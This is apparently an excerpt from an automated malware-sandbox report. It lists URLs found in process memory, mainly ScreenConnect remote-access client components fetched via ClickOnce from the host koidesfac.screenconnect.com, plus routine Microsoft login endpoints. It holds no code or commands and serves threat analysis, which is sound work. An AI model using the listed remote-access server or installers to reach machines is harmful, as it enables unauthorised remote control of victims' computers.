                  Source: svchost.exe, 00000007.00000002.3279676811.000001CCF8137000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060578513.000001CCF8157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/msangcwam
                  Source: ScreenConnect.Core.dll0.1.drString found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
                  Source: edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                  Source: svchost.exe, 00000006.00000003.2043919389.0000018F2A460000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenco
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26D31000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2530333288.000000001B950000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com-
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Clie
                  Source: dfsvc.exe, 00000001.00000002.3018898554.0000020C40E01000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001381000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001299000.00000004.00000020.00020000.00000000.sdmp, NL9Z8XK8.log.1.drString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application089
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.00000000012C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application089b0iO
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application8
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application89
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.00000000012C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application9h0
                  Source: NL9Z8XK8.log.1.drString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=instanc
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationAG
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationD
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationG
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationH
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.0000000002FC0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationX
                  Source: dfsvc.exe, 00000001.00000002.3017968279.0000020C40CB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicatione=msild
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529863446.000000001B8C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationst
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26DA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationx
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2524656280.0000000001353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.applicationy
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3015186666.0000020C3F20E000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3017210252.0000020C40C25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.dll
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2527787169.000000000303D000.00000004.00000800.00020000.00000000.sdmp, NL9Z8XK8.log.1.drString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Client.manifest:
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientSe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.dll
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exe
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exe4
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientService.exel
                  Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.2529761334.000000001B88B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.ClientZu
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dll
                  Source: dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Core.dllL#
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Wind8
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C271B5000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3002950824.0000020C24EF4000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Windows.dll
                  Source: dfsvc.exe, 00000001.00000002.3002950824.0000020C24EF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.Windows.dllC
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstage
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.ex
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27167000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018292902.0000020C40D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe.config3
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exeL
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsBackstageShell.exe_
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsC0
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27211000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C26CD9000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018489953.0000020C40D77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exe.configq
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsClient.exx
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C270FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.e
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3003585301.0000020C27047000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C27159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.config
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exe.configf
                  Source: dfsvc.exe, 00000001.00000002.3018986374.0000020C42E70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManager.exek
                  Source: dfsvc.exe, 00000001.00000002.3003585301.0000020C2717F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://koidesfac.screenconnect.com/Bin/ScreenConnect.WindowsFileManagp
                  Source: svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: svchost.exe, 00000007.00000003.2148532267.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srfe
                  Source: svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srfe.com
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3279962006.000001CCF860A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278890014.000001CCF78F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2374784781.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                  Source: svchost.exe, 00000007.00000003.2148532267.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srfA7826
                  Source: svchost.exe, 00000007.00000003.2148532267.000001CCF8609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/RST2.srft
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                  Source: svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsec
                  Source: svchost.exe, 00000007.00000002.3278890014.000001CCF7902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecur
                  Source: svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278245997.000001CCF782B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278890014.000001CCF7902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                  Source: svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
                  Source: svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF812C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                  Source: svchost.exe, 00000007.00000002.3280491328.000001CCF86B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Duuq61QX7Z9lMRncZtk5giMTtyHGQCaGzksaKT36
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278357760.000001CCF7840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                  Source: svchost.exe, 00000007.00000003.2060602077.000001CCF8140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060551070.000001CCF813B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060241659.000001CCF8129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060791976.000001CCF8156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060339454.000001CCF8152000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                  Source: svchost.exe, 00000007.00000002.3278405244.000001CCF785F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060645484.000001CCF816B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2060624779.000001CCF8163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.3280023358.000001CCF8635000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
